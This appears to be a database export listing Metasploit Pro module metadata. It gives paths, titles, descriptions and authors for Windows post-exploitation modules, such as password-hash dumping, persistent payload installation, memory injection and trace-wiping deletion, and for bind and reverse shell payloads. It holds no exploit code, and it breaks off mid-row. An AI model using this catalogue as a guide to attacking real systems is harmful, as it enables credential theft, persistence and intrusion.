1948,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_termserv.rb","post","windows/gather/enum_termserv","post/windows/gather/enum_termserv","Windows Gather Terminal Server Client Connection Information Dumper",300,"This module dumps MRU and connection data for RDP sessions.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix "
1949,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_tokens.rb","post","windows/gather/enum_tokens","post/windows/gather/enum_tokens","Windows Gather Enumerate Domain Admin Tokens (Token Hunter)",300,"This module will identify systems that have a Domain Admin (delegation) token on them. The module will first check whether sufficient privileges are present for certain actions, and run getprivs for SYSTEM. If you elevated privileges to SYSTEM yourself, the SeAssignPrimaryTokenPrivilege will not be assigned; in that case try migrating to another process that is running as SYSTEM. If sufficient privileges are not available, the module will not continue.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham "
1950,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_tomcat.rb","post","windows/gather/enum_tomcat","post/windows/gather/enum_tomcat","Windows Gather Tomcat Server Enumeration",300,"This module will enumerate a Windows system for Tomcat servers.","Metasploit Framework License (BSD)","f",,,,,"t",,"Barry Shteiman "
1951,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_unattend.rb","post","windows/gather/enum_unattend","post/windows/gather/enum_unattend","Windows Gather Unattended Answer File Enumeration",300,"This module will check the file system for a copy of unattend.xml and/or autounattend.xml, found on Windows Vista or newer Windows systems, and then extract sensitive information such as usernames and decoded passwords.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx, URL-http://technet.microsoft.com/en-us/library/ff715801","Ben Campbell , Sean Verity , sinn3r "
1952,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/duqu_check.rb","post","windows/gather/forensics/duqu_check","post/windows/gather/forensics/duqu_check","Windows Gather Forensics Duqu Registry Check",300,"This module searches for CVE-2011-3402 (Duqu) related registry artifacts.","Metasploit Framework License (BSD)","f",,,,,"t","CVE-2011-3402, URL-http://r-7.co/w5h7fY","Marcus J. Carey "
1953,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/enum_drives.rb","post","windows/gather/forensics/enum_drives","post/windows/gather/forensics/enum_drives","Windows Gather Physical Drives and Logical Volumes",300,"This module will list physical drives and logical volumes.","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew "
1954,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/imager.rb","post","windows/gather/forensics/imager","post/windows/gather/forensics/imager","Windows Gather Forensic Imaging",300,"This module will perform byte-for-byte imaging of remote disks and volumes.","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew "
1955,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/nbd_server.rb","post","windows/gather/forensics/nbd_server","post/windows/gather/forensics/nbd_server","Windows Gather Local NBD Server",300,"Maps remote disks and logical volumes to a local Network Block Device server. This allows forensic tools to be executed on the remote disk directly.","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew "
1956,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/forensics/recovery_files.rb","post","windows/gather/forensics/recovery_files","post/windows/gather/forensics/recovery_files","Windows Gather Deleted Files Enumeration and Recovering",300,"This module lists and tries to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Leave it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. ""pdf"") to recover deleted files with that extension, or set FILES to a comma-separated list of IDs (from enumeration) to recover those files. The user must take into account that file enumeration and recovery can take a long time; use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.youtube.com/watch?v=9yzCf360ujY&hd=1","Borja Merino "
1957,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/hashdump.rb","post","windows/gather/hashdump","post/windows/gather/hashdump","Windows Gather Local User Account Password Hashes (Registry)",300,"This module will dump the local user accounts from the SAM database using the registry.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
1958,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/local_admin_search_enum.rb","post","windows/gather/local_admin_search_enum","post/windows/gather/local_admin_search_enum","Windows Gather Local Admin Search",300,"This module will identify systems in a given range that the supplied domain user (you should migrate into a user pid) has administrative access to, by using the Windows API OpenSCManagerA to establish a handle to the remote host. Additionally, it can enumerate logged in users and group membership via the Windows APIs NetWkstaUserEnum and NetUserGetGroups.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brandon McCann ""zeknox"" , Royce Davis ""r3dy"" , Thomas McCarthy ""smilingraccoon"" "
1959,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/memory_grep.rb","post","windows/gather/memory_grep","post/windows/gather/memory_grep","Windows Gather Process Memory Grep",300,"This module allows for searching the memory space of a process for potentially sensitive data.","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit "
1960,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/netlm_downgrade.rb","post","windows/gather/netlm_downgrade","post/windows/gather/netlm_downgrade","Windows NetLM Downgrade Attack",300,"This module will change a registry value to enable the sending of LM challenge hashes and then initiate an SMB connection to the host given in the SMBHOST option. If an SMB server is listening there, it will receive the NetLM hashes.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks","Brandon McCann ""zeknox"" , Thomas McCarthy ""smilingraccoon"" "
1961,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/resolve_sid.rb","post","windows/gather/resolve_sid","post/windows/gather/resolve_sid","Windows Gather Local User Account SID Lookup",300,"This module prints information about a given SID from the perspective of this session.","Metasploit Framework License (BSD)","f",,,,,"t",,"chao-mu"
1962,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/reverse_lookup.rb","post","windows/gather/reverse_lookup","post/windows/gather/reverse_lookup","Windows Gather IP Range Reverse Lookup",300,"This module uses Railgun, calling the gethostbyaddr function, to resolve each IP address in a range to its hostname.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix "
1963,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/screen_spy.rb","post","windows/gather/screen_spy","post/windows/gather/screen_spy","Windows Gather Screen Spy",300,"This module will incrementally take desktop screenshots from the host. This allows for screen spying, which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. NOTES: set VIEW_CMD to control how screenshots are opened/displayed; the file name will be appended directly to the end of the value of VIEW_CMD (use 'auto' to have the module do its best: the default browser for Windows, firefox for *nix, and the Preview app for Macs). 'eog -s -f -w' is a handy VIEW_CMD for *nix. To suppress opening of screenshots altogether, set the VIEW_CMD option to 'none'.","Metasploit Framework License (BSD)","f",,,,,"t",,"Adrian Kubok, Roni Bachar , bannedit , kernelsmith "
1964,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/smart_hashdump.rb","post","windows/gather/smart_hashdump","post/windows/gather/smart_hashdump","Windows Gather Local and Domain Controller Account Password Hashes",300,"This module will dump local accounts from the SAM database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on the privilege level, OS and role of the host.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1965,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/tcpnetstat.rb","post","windows/gather/tcpnetstat","post/windows/gather/tcpnetstat","Windows Gather TCP Netstat",300,"This module lists current TCP sessions.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix "
1966,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/usb_history.rb","post","windows/gather/usb_history","post/windows/gather/usb_history","Windows Gather USB Drive History",300,"This module will enumerate USB drive history on a target host.","Metasploit Framework License (BSD)","f",,,,,"t",,"nebulus"
1967,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/win_privs.rb","post","windows/gather/win_privs","post/windows/gather/win_privs","Windows Gather Privileges Enumeration",300,"This module will print if UAC is enabled, and if the current account is ADMIN enabled. 
It will also print UID, foreground SESSION ID, is SYSTEM status and current process PRIVILEGES.","Metasploit Framework License (BSD)","f",,,,,"t",,"Merlyn Cousins " 1968,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/wmic_command.rb","post","windows/gather/wmic_command","post/windows/gather/wmic_command","Windows Gather Run Specified WMIC Command",300,"This module will execute a given WMIC command options or read WMIC commands options from a resource file and execute the commands in the specified Meterpreter session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1969,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/word_unc_injector.rb","post","windows/gather/word_unc_injector","post/windows/gather/word_unc_injector","Microsoft Word UNC Path Injector",300,"This module modifies a remote .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://jedicorp.com/?p=534","SphaZ " 1970,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/add_user_domain.rb","post","windows/manage/add_user_domain","post/windows/manage/add_user_domain","Windows Manage Add User to the Domain and/or to a Domain Group",300,"This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run getprivs for system. If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to a process that is running as system. 
If you don't have privs, this script exits.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham " 1971,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/autoroute.rb","post","windows/manage/autoroute","post/windows/manage/autoroute","Windows Manage Network Route via Meterpreter Session",300,"This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK.","Metasploit Framework License (BSD)","f",,,,,"t",,"todb " 1972,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/clone_proxy_settings.rb","post","windows/manage/clone_proxy_settings","post/windows/manage/clone_proxy_settings","Windows Manage Proxy Setting Cloner",300,"This module copies the proxy settings from the current user to the targeted user SID, supports remote hosts as well if remote registry is allowed.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1973,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/delete_user.rb","post","windows/manage/delete_user","post/windows/manage/delete_user","Windows Manage Local User Account Deletion",300,"This module deletes a local user account from the specified server, or the local machine if no server is given.","Metasploit Framework License (BSD)","f",,,,,"t",,"chao-mu" 1974,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/download_exec.rb","post","windows/manage/download_exec","post/windows/manage/download_exec","Windows Manage Download and/or Execute",300,"This module will download a file by importing urlmon via railgun. 
The user may also choose to execute the file with arguments via exec_string.","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan" 1975,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/enable_rdp.rb","post","windows/manage/enable_rdp","post/windows/manage/enable_rdp","Windows Manage Enable Remote Desktop",300,"This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target's port 3389/tcp.","BSD License","f",,,,,"t",,"Carlos Perez " 1976,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/inject_ca.rb","post","windows/manage/inject_ca","post/windows/manage/inject_ca","Windows Manage Certificate Authority Injection",300,"This module allows the attacker to insert an arbitrary CA certificate into the victim's Trusted Root store.","BSD License","f",,,,,"t",,"vt " 1977,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/inject_host.rb","post","windows/manage/inject_host","post/windows/manage/inject_host","Windows Manage Hosts File Injection",300,"This module allows the attacker to insert a new entry into the target system's hosts file.","BSD License","f",,,,,"t",,"vt " 1978,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/migrate.rb","post","windows/manage/migrate","post/windows/manage/migrate","Windows Manage Process Migration",300,"This module will migrate a Meterpreter session from one process to another. 
A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1979,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/mssql_local_auth_bypass.rb","post","windows/manage/mssql_local_auth_bypass","post/windows/manage/mssql_local_auth_bypass","Windows Manage Local Microsoft SQL Server Authorization Bypass",300,"When this module is executed, it can be used to add a sysadmin to local SQL Server instances. It first attempts to gain LocalSystem privileges using the ""getsystem"" escalation methods. If those privileges are not sufficient to add a sysadmin, then it will migrate to the SQL Server service process associated with the target instance. The sysadmin login is added to the local SQL Server using native SQL clients and stored procedures. If no instance is specified then the first identified instance will be used. Why is this possible? By default in SQL Server 2k-2k8, LocalSystem is assigned syadmin privileges. Microsoft changed the default in SQL Server 2012 so that LocalSystem no longer has sysadmin privileges. However, this can be overcome by migrating to the SQL Server process.","Metasploit Framework License (BSD)","f",,,,,"t",,"Scott Sutherland " 1980,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/multi_meterpreter_inject.rb","post","windows/manage/multi_meterpreter_inject","post/windows/manage/multi_meterpreter_inject","Windows Manage Inject in Memory Multiple Payloads",300,"This module will inject in to several process a given payload and connecting to a given list of IP Addresses. 
The module works with a given lists of IP Addresses and process PIDs if no PID is given it will start a the given process in the advanced options and inject the selected payload in to the memory of the created module.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1981,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/nbd_server.rb","post","windows/manage/nbd_server","post/windows/manage/nbd_server","Windows Manage Local NBD Server for Remote Disks",300,"Maps remote disks and logical volumes to a local Network Block Device server. Allows for forensic tools to be executed on the remote disk directly.","Metasploit Framework License (BSD)","f",,,,,"t",,"Wesley McGrew " 1982,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/payload_inject.rb","post","windows/manage/payload_inject","post/windows/manage/payload_inject","Windows Manage Memory Payload Injection Module",300,"This module will inject into the memory of a process a specified windows payload. If a payload or process is not provided one will be created by default using a reverse x86 TCP Meterpreter Payload.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1983,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/persistence.rb","post","windows/manage/persistence","post/windows/manage/persistence","Windows Manage Persistent Payload Installer",300,"This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. 
REXE mode will transfer a binary of your choosing to remote host to be used as a payload.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Merlyn drforbin Cousins " 1984,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/powershell/exec_powershell.rb","post","windows/manage/powershell/exec_powershell","post/windows/manage/powershell/exec_powershell","Windows Manage PowerShell Download and/or Execute",300,"This module will download and execute a PowerShell script over a meterpreter session. The user may also enter text substitutions to be made in memory before execution. Setting VERBOSE to true will output both the script prior to execution and the results.","Metasploit Framework License (BSD)","f",,,,,"t",,"Nicholas Nam (nick , RageLtMan" 1985,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/pxexploit.rb","post","windows/manage/pxexploit","post/windows/manage/pxexploit","Windows Manage PXE Exploit Server",300,"This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen. The windows user will have the password p@SSw0rd!123456 (in case of complexity requirements) and will be added to the administrators group. See exploit/windows/misc/pxesploit for a version to deliver a specific payload. 
Note: the displayed IP address of a target is the address this DHCP server handed out, not the ""normal"" IP address the host uses.","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie" 1986,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/reflective_dll_inject.rb","post","windows/manage/reflective_dll_inject","post/windows/manage/reflective_dll_inject","Windows Manage Reflective DLL Injection Module",300,"This module will inject into the memory of a process a specified Reflective DLL.","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","Ben Campbell " 1987,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/remove_ca.rb","post","windows/manage/remove_ca","post/windows/manage/remove_ca","Windows Manage Certificate Authority Removal",300,"This module allows the attacker to remove an arbitrary CA certificate from the victim's Trusted Root store.","BSD License","f",,,,,"t",,"vt " 1988,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/remove_host.rb","post","windows/manage/remove_host","post/windows/manage/remove_host","Windows Manage Host File Entry Removal",300,"This module allows the attacker to remove an entry from the Windows hosts file.","BSD License","f",,,,,"t",,"vt " 1989,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/rpcapd_start.rb","post","windows/manage/rpcapd_start","post/windows/manage/rpcapd_start","Windows Manage Remote Packet Capture Service Starter",300,"This module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall). If authentication is enabled you need a local user account to capture traffic. 
PORT will be used depending of the mode configured.","Metasploit Framework License (BSD)","f",,,,,"t",,"Borja Merino " 1990,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/run_as.rb","post","windows/manage/run_as","post/windows/manage/run_as","Windows Manage Run Command As User",300,"This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to display.By setting advanced option SETPASS to true, it will reset the users password and then execute the command.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499" 1991,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/sdel.rb","post","windows/manage/sdel","post/windows/manage/sdel","Windows Manage Safe Delete",300,"The goal of the module is to hinder the recovery of deleted files by overwriting its contents. This could be useful when you need to download some file on the victim machine and then delete it without leaving clues about its contents. Note that the script does not wipe the free disk space so temporary/sparse/encrypted/compressed files could not be overwritten. Note too that MTF entries are not overwritten so very small files could stay resident within the stream descriptor.","BSD License","f",,,,,"t",,"Borja Merino " 1992,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/smart_migrate.rb","post","windows/manage/smart_migrate","post/windows/manage/smart_migrate","Windows Manage Smart Process Migration",300,"This module will migrate a Meterpreter session. It will first attempt to migrate to winlogon.exe . If that fails it will then look at all of the explorer.exe processes. If there is one that exists for the user context the session is already in it will try that. 
Failing that it will fall back and try any other explorer.exe processes it finds","Metasploit Framework License (BSD)","f",,,,,"t",,"thelightcosine" 1993,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_create.rb","post","windows/manage/vss_create","post/windows/manage/vss_create","Windows Manage Create Shadow Copy",300,"This module will attempt to create a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1994,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_list.rb","post","windows/manage/vss_list","post/windows/manage/vss_list","Windows Manage List Shadow Copies",300,"This module will attempt to list any Volume Shadow Copies on the system. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1995,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_mount.rb","post","windows/manage/vss_mount","post/windows/manage/vss_mount","Windows Manage Mount Shadow Copy",300,"This module will attempt to mount a Volume Shadow Copy on the system. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. 
Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1996,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_set_storage.rb","post","windows/manage/vss_set_storage","post/windows/manage/vss_set_storage","Windows Manage Set Shadow Copy Storage Space",300,"This module will attempt to change the ammount of space for volume shadow copy storage. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1997,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_storage.rb","post","windows/manage/vss_storage","post/windows/manage/vss_storage","Windows Manage Get Shadow Copy Storage Info",300,"This module will attempt to get volume shadow copy storage info. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1998,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/webcam.rb","post","windows/manage/webcam","post/windows/manage/webcam","Windows Manage Webcam",300,"This module will allow the user to detect installed webcams (with the LIST action) or take a snapshot (with the SNAPSHOT) action.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1999,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/recon/computer_browser_discovery.rb","post","windows/recon/computer_browser_discovery","post/windows/recon/computer_browser_discovery","Windows Recon Computer Browser Discovery",300,"This module uses railgun to discover hostnames and IPs on the network. 
LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browswers), WINDOWS (all Windows hosts), or UNIX (all Unix hosts).","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 2000,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/recon/resolve_hostname.rb","post","windows/recon/resolve_hostname","post/windows/recon/resolve_hostname","Windows Recon Resolve Hostname",300,"This module resolves a hostname to IP address via the victim, similiar to the Unix dig command","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 2001,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/post/windows/recon/resolve_ip.rb","post","windows/recon/resolve_ip","post/windows/recon/resolve_ip","Windows Recon Resolve IP",300,"This module reverse resolves a range or IP to a hostname","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 2002,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_bss_list.rb","post","windows/wlan/wlan_bss_list","post/windows/wlan/wlan_bss_list","Windows Gather Wireless BSS Info",300,"This module gathers information about the wireless Basic Service Sets available to the victim machine.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2003,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_current_connection.rb","post","windows/wlan/wlan_current_connection","post/windows/wlan/wlan_current_connection","Windows Gather Wireless Current Connection Info",300,"This module gathers information about the current connection on each wireless lan interface on the target machine.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2004,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_disconnect.rb","post","windows/wlan/wlan_disconnect","post/windows/wlan/wlan_disconnect","Windows Disconnect Wireless Connection",300,"This module disconnects the current wireless network connection on the specified interface.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2005,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_profile.rb","post","windows/wlan/wlan_profile","post/windows/wlan/wlan_profile","Windows Gather Wireless Profile",300,"This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behaviour is slightly different bewteen OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2006,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb","payload","aix/ppc/shell_bind_tcp","payload/aix/ppc/shell_bind_tcp","AIX Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2007,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_find_port.rb","payload","aix/ppc/shell_find_port","payload/aix/ppc/shell_find_port","AIX Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2008,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_interact.rb","payload","aix/ppc/shell_interact","payload/aix/ppc/shell_interact","AIX execve shell for inetd",300,"Simply execve /bin/sh (for inetd programs)","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2009,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb","payload","aix/ppc/shell_reverse_tcp","payload/aix/ppc/shell_reverse_tcp","AIX Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2010,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/android/reverse_tcp.rb","payload","android/meterpreter/reverse_tcp","payload/android/meterpreter/reverse_tcp","Android Meterpreter, Dalvik Reverse TCP Stager",300,"Connect back stager, Run a meterpreter server on Android","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi, timwr" 2011,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/android/reverse_tcp.rb","payload","android/shell/reverse_tcp","payload/android/shell/reverse_tcp","Command Shell, Dalvik Reverse TCP Stager",300,"Connect back stager, Spawn a piped command shell (sh)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi, timwr" 2012,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb","payload","bsd/sparc/shell_bind_tcp","payload/bsd/sparc/shell_bind_tcp","BSD Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2013,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb","payload","bsd/sparc/shell_reverse_tcp","payload/bsd/sparc/shell_reverse_tcp","BSD Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2014,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/exec.rb","payload","bsd/x86/exec","payload/bsd/x86/exec","BSD Execute Command",300,"Execute an arbitrary command","Metasploit Framework 
License (BSD)","f",,,,,"t",,"vlad902 " 2015,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb","payload","bsd/x86/metsvc_bind_tcp","payload/bsd/x86/metsvc_bind_tcp","FreeBSD Meterpreter Service, Bind TCP",300,"Stub payload for interacting with a Meterpreter Service","BSD License","f",,,,,"t",,"hdm " 2016,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb","payload","bsd/x86/metsvc_reverse_tcp","payload/bsd/x86/metsvc_reverse_tcp","FreeBSD Meterpreter Service, Reverse TCP Inline",300,"Stub payload for interacting with a Meterpreter Service","BSD License","f",,,,,"t",,"hdm " 2017,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb","payload","bsd/x86/shell/bind_ipv6_tcp","payload/bsd/x86/shell/bind_ipv6_tcp","BSD Command Shell, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , skape , vlad902 " 2018,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/bind_tcp.rb","payload","bsd/x86/shell/bind_tcp","payload/bsd/x86/shell/bind_tcp","BSD Command Shell, Bind TCP Stager",300,"Listen for a connection, 